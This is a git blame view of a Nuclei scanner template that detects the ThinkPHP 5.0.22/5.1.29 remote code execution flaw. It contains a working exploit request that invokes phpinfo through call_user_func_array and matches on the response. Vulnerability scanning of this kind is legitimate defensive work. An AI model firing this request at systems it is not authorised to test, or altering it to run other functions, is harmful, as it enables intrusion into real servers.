daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
nuclei-templates/http/vulnerabilities/thinkphp/thinkphp-5022-rce.yaml

32 lines
1.1 KiB
YAML
Raw Normal View History

Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST
2022-09-08 13:28:46 +00:00
id: thinkphp-5022-rce
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST
2022-09-08 13:28:46 +00:00
info:
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements
2022-10-10 19:22:59 +00:00
name: ThinkPHP - Remote Code Execution
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST
2022-09-08 13:28:46 +00:00
author: dr_set
severity: critical
Dashboard Content Enhancements (#5582) Dashboard Content Enhancements
2022-10-10 19:22:59 +00:00
description: ThinkPHP 5.0.22 and 5.1.29 are susceptible to remote code execution if the website doesn't have mandatory routing enabled, which is the default setting. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST
2022-09-08 13:28:46 +00:00
reference: https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/5-rce
Added max request counter of each template
2023-04-28 08:11:21 +00:00
metadata:
max-request: 1
templateman update
2023-10-14 11:27:55 +00:00
tags: thinkphp,rce
refactor: Description field uniformization * info field reorder * reference values refactored to list * added new lines after the id and before the protocols * removed extra new lines * split really long descriptions to multiple lines (part 1) * other minor fixes
2022-04-22 10:38:41 +00:00
Refactoring the directory structure based on protocols (#7137) * moving http templates * updated cves.json * moved network CVEs * updated scripts * updated workflows * updated requests to http * replaced network to tcp --------- Co-authored-by: sandeep <8293321+ehsandeep@users.noreply.github.com>
2023-04-27 04:28:59 +00:00
http:
Dashboard Content Enhancements (#5324) Dashboard Content Enhancements * dos2nix on several templates * replacing some cvedetails links with NIST
2022-09-08 13:28:46 +00:00
- method: GET
path:
- "{{BaseURL}}?s=index/think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1"
matchers-condition: and
matchers:
- type: word
words:
- "PHP Extension"
- "PHP Version"
- "ThinkPHP"
condition: and
- type: status
status:
- 200
TemplateMan Update [Fri Oct 20 11:41:12 UTC 2023] :robot:
2023-10-20 11:41:13 +00:00
# digest: 4b0a00483046022100ee65575ab1901e3f23b7c1891b8a08b0b6e5593256533a8450d227df88ab679d022100920cc2dba8c2ffb1ae53faa6ff927fe673b15ef8d2326504825b870f6d398cd5:922c64590222798bb761d5b6d8e72950